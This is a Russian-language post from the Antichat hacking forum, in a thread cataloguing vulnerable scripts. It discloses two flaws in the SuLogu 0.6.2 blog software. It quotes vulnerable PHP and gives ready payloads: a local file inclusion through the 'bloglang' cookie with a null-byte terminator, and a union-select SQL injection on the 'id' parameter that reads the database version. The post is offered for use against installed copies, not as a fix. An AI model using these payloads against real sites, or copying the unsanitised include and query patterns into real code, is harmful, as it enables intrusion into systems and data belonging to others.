Форум АНТИЧАТ - Энциклопедия уязвимых скриптов

#11

15.11.2009, 01:11

m0Hze

Он хакер.

Регистрация: 01.11.2008

Сообщений: 1,756

Провел на форуме:
6462214

Репутация: 3171

Product: SuLogu
Author: unnamed
Version: 0.6.2

LFI

file: comments.php

PHP код:


		
			
...

if (!$language) {

    // try to set the user's preferred language from a previous cookie

    if ($_COOKIE['bloglang']) {

        $language = $_COOKIE['bloglang'];

    } else {

        $language = $defaultlanguage;

        setcookie("bloglang", $defaultlanguage);

    }

} else {    // language must exists among defined tags

    if (!languageexists($language)) {

        $language = $defaultlanguage;

        setcookie("bloglang", $defaultlanguage);

    }

}



// Include corresponding language file.

include("language/" . $language . ".php");

...

target: Отправляем поддельный запрос на сервер,и подставляем в COOKIES: bloglang={LFI}'%00; За пределы директории у меня не вышел,возможно вам повезет больше (:

Также там множество SQL-inj, но разработчики просто удивляют нас,тем что расчитывают,что везде будет включено registers_global.
Например:

file: index.php

PHP код:


		
			
...

function imagenavmenu($id, $page) {

    global $showall, $language;



    $res = mysql_query("SELECT id FROM blogimages WHERE id < " . $id . " ORDER BY id DESC LIMIT 1");

...

Но $id нигде не будет объявляться,так что скрипт,как и SQL-inj убдет работать только на registers_global = on;
?id=-1+union+select+1,2,3,4,version(),6,7/*

Последний раз редактировалось m0Hze; 15.11.2009 в 15:54..